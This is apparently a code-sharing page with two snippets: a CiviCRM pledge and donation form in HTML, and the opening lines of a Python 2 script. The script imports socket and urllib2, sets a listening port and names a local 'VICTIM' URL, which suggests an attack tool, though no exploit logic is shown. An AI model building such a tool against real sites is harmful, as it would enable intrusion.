This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<div class="content"> | |
<input type="radio" class="form-radio" checked="checked" name="is_pledge" id="CIVICRM_QFID_0_18" value="0"><label for="CIVICRM_QFID_0_18">I want to make a one-time contribution</label><br><input type="radio" class="form-radio" name="is_pledge" id="CIVICRM_QFID_1_20" value="1"><label for="CIVICRM_QFID_1_20">I pledge to contribute this amount every</label> | |
<select class="form-select valid" id="pledge_frequency_unit" name="pledge_frequency_unit"> | |
<option value="month">month</option> | |
</select> for <input type="text" class="form-text" id="pledge_installments" name="pledge_installments" size="3"> installments. | |
</div> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
import socket | |
import json | |
import urllib2 | |
import sys | |
HOST = '' # Symbolic name meaning all available interfaces | |
PORT = 50132 # Arbitrary non-privileged port | |
VICTIM = 'http://localhost:3000' |
NewerOlder